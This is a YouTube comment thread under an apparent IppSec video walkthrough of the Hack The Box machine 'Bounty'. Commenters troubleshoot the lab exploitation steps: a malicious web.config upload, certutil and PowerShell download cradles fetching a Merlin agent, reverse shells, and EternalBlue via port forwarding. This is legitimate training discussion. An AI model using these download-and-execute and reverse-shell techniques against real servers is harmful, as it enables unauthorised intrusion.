You didn't get any response back from the server after accessing the "web.config" because the response is an HTML comment. Look at the source code. There you can see the response.
Yep. There was a point in the video where that happened. Programs behave unexpectedly when you bend their will and make them do things they aren't meant to do.
@@ippsec I found if 3+ users simultaneously are trying to get that with web.config the page is unexpected error. The thing is after you are trying to upload again the payload is not recognized. I don't know how this is working..
Could you clarify what you mean by this? I was never able to get Merlin agent to connect with the listener. Everything seemed to be working fine. Even had a reverse shell on the box to confirm execution, captured packets, tried multiple merlin versions. I could get the agent on the box and executing and the listener running on the correct local IP and port. The agent never picks it up.
@@semiranotics2753 It was a long time ago... But make sure that client and server have the correct time, otherwise the handshake will fail, since auth has a time factor
How did you setup your Go environment? I get nothing but errors when running 'go run cmd/merlinserver/main.go'. This is after setting the GOPATH variable to $HOME/go. Ive also tried setting the variable to $HOME/hackthebox/bounty/merlin. No dice. Thanks for the videos!
Without the errors, its pretty hard to help. I'd guess its dependency issues, watch the Rabbit Video. When you have issues you can just search "ippsec " and find other videos i used it in.
Great video - one quick question; I used the powershell IEX(New-Object Net.WebClient).downloadFile instead of .downloadString; somehow it appears not working well. Is there any specific reasons?
You didn't set the LHOST properly for the eternal blue exploit. You set it to tun0, but the IP was localhost so it was just trying to connect back to merlin instead of your listener on your tun0 IP.
No reason. Just personal preference to be verbose, when I had first read about it -- Saw A was aggressive which sounded dangerous for an initial portscan.
Go into the `C:\Users\merlin\Desktop` directory. There you can display its hidden children with the PowerShell command: `Get-ChildItem . -Force` As you can see, the output to the console reveals a `user.txt` file. You can run `Get-ChildItem . -Force > user` Then simply run `type user.txt` and the md5 hash should be returned. Docs: docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.1
@IppSec dumb question but where do you get your shells is it just from over the years of collecting them ? Or is there a good GitHub site to get a bunch of them ?
Did you ever made a mapping between your videos and the tools/techniques/OS used? if so please do share , if not guess I will have to do it myself ......🤓
Hi, new subscriber here and just watched the video now. First of all thanks for all the great content. I thinks your videos are great. I like pace, depth of content and I have to admit, they also make you laugh from time to time :-) As per the MS17-010 fail, could it be because even though you did create the portfwd rules, you always run the exploit with RHOST set to 445 so you were actually not attacking the other ports? I know this is 9 months later and you must have figured out the reason already but just my 2 cent.
Hi! I have a vbscript RCE on the box. When I use it with ping.exe and my IP Address I get requests from the box. So this is working: code exec and the back connection. When I try to start powershell.exe with the absolute path it responses without errors. But if I use ping in the PS it does not work. downloadString does not work either. I have no way to see error messages. In gerneral: Is there a way of getting a reverse_shell without PS or through vbscript? Is there a cmd.exe reverse shell? And what could I do for further testing? I do not want to use merlin.. btw: Ippsec, your videos are awesome and I cannot tell how much I already learned! Thank soo much!
CMD does not have a reverse shell. Could code one in VBScript or upload something like NC. You could assign Powershell Output to a variable and print it out via VBScript. Same way it printed 1+2 earlier in the video.
I don't remember, generally I just like reverse https because its encrypted and won't die if it cannot talk back to the C2. Do a reverse_tcp and restart MSF, you lose the shell. http/s you'll get the shell back when you start MSF back up.
For some reason I cannot execute anything on this box. ping works, download as well but it will not execute anything. Tried to revert box multiple times, im alone on the lab but rev shell just never call back
There aren't a lot of good ways to download files from a command prompt. Unlike linux, you can't just curl() on windows. It is possible to use PowerShell to do invoke-webrequest of (New-Object Net.WebClient).DownloadFile -- but that's a lot of typing.
Unable to connect to merlin when i upload web.config...tried almost a day,everything seems perfect.But still no connection received in merlin...can you please help???
Did you ever get this figured out? I was never able to get Merlin agent to connect with the listener. Everything seemed to be working fine. Even had a reverse shell on the box to confirm execution, captured packets, tried multiple merlin versions. I could get the agent on the box and executing and the listener running on the correct local IP and port. The agent never picks it up.
I know some time has gone by since your comment, but let me know if you're still having problems. The command you want to run has to been in the %PATH% variable. Often times the problem is that you need to specify a shell to execute the command in like "cmd.exe /c whoami" or "/bin/bash cat /etc/passwd". Hope this helps.
Hi. The video is amazing , actually your trick to use ettrnalblue after forwarding port is working, you just need to set LHOST as your real ip because i dont know why, it was set to localhost .
@@276rachid Yeah I'm not sure - I had edited the description a day or two ago. Definitely "set LHOST tun0" twice before doing EB. Hard to read something while speaking a different thing, didn't see listening on 127.0.0.1. Sad that bug happened but atleast what i was trying to show worked (portfwd).
[Seeking Help] Not sure if anyone encountered the same error as me (I scrolled through the comments and did not find anyone in the same situation), but I had encountered this error when I was running "10.10.10.93/uploadedfiles/web.config" after uploading my web.config with the certutil command that IppSec posted: **** Online **** 000000 ... bef400 CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5) CertUtil: Access is denied. I noticed that in IppSec's case, his browser returned an empty page after it finished loading, while mine returned this error message about certutil above. I had reverted the machine and tried this on more than one occasion, with the same error message. After I got this error message, I modified my web.config with the parameters "cmd /c cd ..\..\..\Users\Public & dir" to check if agent.exe was now on the machine, and yes it is, "12,514,304 agent.exe". However, I tried to get the reverse connection with "cmd /c C:\users\public\agent.exe" in my web.config and "root@kali:~/merlin# go run cmd/merlinserver/main.go -i [IP address of tun0 interface]", but this did not work out.
@@dbiviss Use go get to download packages. Search "ippsec merlin" or "ippsec go" something to find other videos I use it. Chances are I go over installing dependencies, in earlier videos.
![เปิด อาณาจักร หมื่นล้าน "สาระตั้ม" l [Nickynachat]](http://i.ytimg.com/vi/3XE0nPF4YkQ/mqdefault.jpg)
tell me one reason to classify this as a box for beginners
Because its easy
@Watson Joe who names their kid Watson joe? Stop trying to scam people
@@chiraqsoulja you dont look cool by saying that its easy
You didn't get any response back from the server after accessing the "web.config" because the response is an HTML comment. Look at the source code. There you can see the response.
🙏Thank you for all the great videos IppSec! You are a master ninja ⚔️
This box was pretty unstable and sometimes the shell via web.config did not work.
Yep. There was a point in the video where that happened. Programs behave unexpectedly when you bend their will and make them do things they aren't meant to do.
@@ippsec I found if 3+ users simultaneously are trying to get that with web.config the page is unexpected error. The thing is after you are trying to upload again the payload is not recognized. I don't know how this is working..
Maybe a tip for anyone having issues with merlin: Time must be exact both on server and client.
But like always great vid!
Could you clarify what you mean by this? I was never able to get Merlin agent to connect with the listener. Everything seemed to be working fine. Even had a reverse shell on the box to confirm execution, captured packets, tried multiple merlin versions. I could get the agent on the box and executing and the listener running on the correct local IP and port. The agent never picks it up.
@@semiranotics2753 It was a long time ago... But make sure that client and server have the correct time, otherwise the handshake will fail, since auth has a time factor
How did you setup your Go environment? I get nothing but errors when running 'go run cmd/merlinserver/main.go'. This is after setting the GOPATH variable to $HOME/go. Ive also tried setting the variable to $HOME/hackthebox/bounty/merlin. No dice. Thanks for the videos!
Without the errors, its pretty hard to help. I'd guess its dependency issues, watch the Rabbit Video. When you have issues you can just search "ippsec " and find other videos i used it in.
@@ippsec Thanks! That helped me sort out what I had wrong.
Great work, appreciated. Big fan
Great as always
lost it at "unsupported? youre unsupported"
42:45 --> Best moment of the video
Great video - one quick question; I used the powershell IEX(New-Object Net.WebClient).downloadFile instead of .downloadString; somehow it appears not working well. Is there any specific reasons?
You didn't set the LHOST properly for the eternal blue exploit. You set it to tun0, but the IP was localhost so it was just trying to connect back to merlin instead of your listener on your tun0 IP.
Awesome as usual? Reason you use -sC -sV over -A? Less chars typed is ❤ for ctfs. Keep em coming!
No reason. Just personal preference to be verbose, when I had first read about it -- Saw A was aggressive which sounded dangerous for an initial portscan.
The user flag is a link, how did you get it?
Learn !!!
Go into the `C:\Users\merlin\Desktop` directory. There you can display its hidden children with the PowerShell command: `Get-ChildItem . -Force`
As you can see, the output to the console reveals a `user.txt` file.
You can run `Get-ChildItem . -Force > user`
Then simply run `type user.txt` and the md5 hash should be returned.
Docs: docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.1
@IppSec dumb question but where do you get your shells is it just from over the years of collecting them ? Or is there a good GitHub site to get a bunch of them ?
Pretty sure every shell I use on these videos is created in a previous video, or explained where I grabbed it from. I only use this VM for videos
Did you ever made a mapping between your videos and the tools/techniques/OS used? if so please do share , if not guess I will have to do it myself ......🤓
Nope. Notes are all on you, if you know what you’re looking for you can just do a TH-cam search for that. Ex. ippsec union injection
You can try ippsec.rocks
Is there a reason why rotten potato doesn't work (and neither does Tater.ps1), but juicy potato does?
Hi, new subscriber here and just watched the video now. First of all thanks for all the great content. I thinks your videos are great. I like pace, depth of content and I have to admit, they also make you laugh from time to time :-) As per the MS17-010 fail, could it be because even though you did create the portfwd rules, you always run the exploit with RHOST set to 445 so you were actually not attacking the other ports? I know this is 9 months later and you must have figured out the reason already but just my 2 cent.
Hi! I have a vbscript RCE on the box. When I use it with ping.exe and my IP Address I get requests from the box. So this is working: code exec and the back connection. When I try to start powershell.exe with the absolute path it responses without errors. But if I use ping in the PS it does not work. downloadString does not work either. I have no way to see error messages.
In gerneral: Is there a way of getting a reverse_shell without PS or through vbscript? Is there a cmd.exe reverse shell?
And what could I do for further testing? I do not want to use merlin..
btw: Ippsec, your videos are awesome and I cannot tell how much I already learned! Thank soo much!
CMD does not have a reverse shell. Could code one in VBScript or upload something like NC. You could assign Powershell Output to a variable and print it out via VBScript. Same way it printed 1+2 earlier in the video.
Thanks! I definitely learned a lot about the importance between "cmd" and "cmd /c" and using \\ instead of \ @@ippsec
Why did you use a HTTPS reverse shell in part 2 when you pwn using metasploit? Would a standard TCP reverse shell not of worked?
I don't remember, generally I just like reverse https because its encrypted and won't die if it cannot talk back to the C2. Do a reverse_tcp and restart MSF, you lose the shell. http/s you'll get the shell back when you start MSF back up.
For some reason I cannot execute anything on this box. ping works, download as well but it will not execute anything. Tried to revert box multiple times, im alone on the lab but rev shell just never call back
merlin is useful nowadays?
Great vid as always!
Hi, sorry for the stupid question but why you use certutil to download the agent on the machine ?
There aren't a lot of good ways to download files from a command prompt. Unlike linux, you can't just curl() on windows. It is possible to use PowerShell to do invoke-webrequest of (New-Object Net.WebClient).DownloadFile -- but that's a lot of typing.
IppSec sure!! Thanks 👍🏽
11:43 -- you did nothing wrong on your whoami command, the output was just commented on the response page...
Unable to connect to merlin when i upload web.config...tried almost a day,everything seems perfect.But still no connection received in merlin...can you please help???
Did you ever get this figured out? I was never able to get Merlin agent to connect with the listener. Everything seemed to be working fine. Even had a reverse shell on the box to confirm execution, captured packets, tried multiple merlin versions. I could get the agent on the box and executing and the listener running on the correct local IP and port. The agent never picks it up.
@@semiranotics2753 sadly i wasn't able to figure it out and moved forward...i only can hope that i will never have to use merlin again...lol
any idea on why i cant get usual cmd commands to work on merlin? like dir, it says not on path
I know some time has gone by since your comment, but let me know if you're still having problems. The command you want to run has to been in the %PATH% variable. Often times the problem is that you need to specify a shell to execute the command in like "cmd.exe /c whoami" or "/bin/bash cat /etc/passwd". Hope this helps.
my migrate is not working which is really annoying.
Do you use Kali as VM or host machine?
Kali as vm and run openvpn htb
"unsupported? your unsupported" - ippsec :D
You should do a video using JexBoss for a java app.
awesome
I cant access by openvpn..its says...private key password verification fails...need help
If issue is still happening, regenerate your certificate. It's under "Access" on the left hand side.
@@ippsec yes...it's works....
Hi. The video is amazing , actually your trick to use ettrnalblue after forwarding port is working, you just need to set LHOST as your real ip because i dont know why, it was set to localhost .
i mean the reverse shell config . You can check 45:22 on the video
@@276rachid Yeah I'm not sure - I had edited the description a day or two ago. Definitely "set LHOST tun0" twice before doing EB. Hard to read something while speaking a different thing, didn't see listening on 127.0.0.1. Sad that bug happened but atleast what i was trying to show worked (portfwd).
[Seeking Help] Not sure if anyone encountered the same error as me (I scrolled through the comments and did not find anyone in the same situation), but I had encountered this error when I was running "10.10.10.93/uploadedfiles/web.config" after uploading my web.config with the certutil command that IppSec posted:
**** Online **** 000000 ... bef400 CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5) CertUtil: Access is denied.
I noticed that in IppSec's case, his browser returned an empty page after it finished loading, while mine returned this error message about certutil above.
I had reverted the machine and tried this on more than one occasion, with the same error message. After I got this error message, I modified my web.config with the parameters "cmd /c cd ..\..\..\Users\Public & dir" to check if agent.exe was now on the machine, and yes it is, "12,514,304 agent.exe".
However, I tried to get the reverse connection with "cmd /c C:\users\public\agent.exe" in my web.config and "root@kali:~/merlin# go run cmd/merlinserver/main.go -i [IP address of tun0 interface]", but this did not work out.
Can't get it to work too :(
Can't get Merlin to work, looks like I have some path problem. Anyone knows how to fix it ? I've checked the docs already
No idea. Without error messages I doubt anyone will be able to help
I think I have the same issue. it seems that the golang can not find the package from github. do you have any solution?
@@ippsec root@localhost:~/tools/merlin# go run cmd/merlinserver/main.go
cmd/merlinserver/main.go:34:2: cannot find package "github.com/Ne0nd0g/merlin/pkg" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg (from $GOPATH)
cmd/merlinserver/main.go:29:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/banner" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/banner (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/banner (from $GOPATH)
cmd/merlinserver/main.go:33:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/cli" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/cli (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/cli (from $GOPATH)
cmd/merlinserver/main.go:32:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/core" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/core (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/core (from $GOPATH)
cmd/merlinserver/main.go:31:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/logging" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/logging (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/logging (from $GOPATH)
cmd/merlinserver/main.go:30:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/servers/http2" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/servers/http2 (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/servers/http2 (from $GOPATH)
cmd/merlinserver/main.go:26:2: cannot find package "github.com/fatih/color" in any of:
/usr/lib/go-1.10/src/github.com/fatih/color (from $GOROOT)
/root/go/src/github.com/fatih/color (from $GOPATH)
@@erikkovacs5744 You try running go get and the package?
@@dbiviss Use go get to download packages. Search "ippsec merlin" or "ippsec go" something to find other videos I use it. Chances are I go over installing dependencies, in earlier videos.
)
w3wp is IIS!
Yeah..I was about to say that
Whats hackthebox is used for?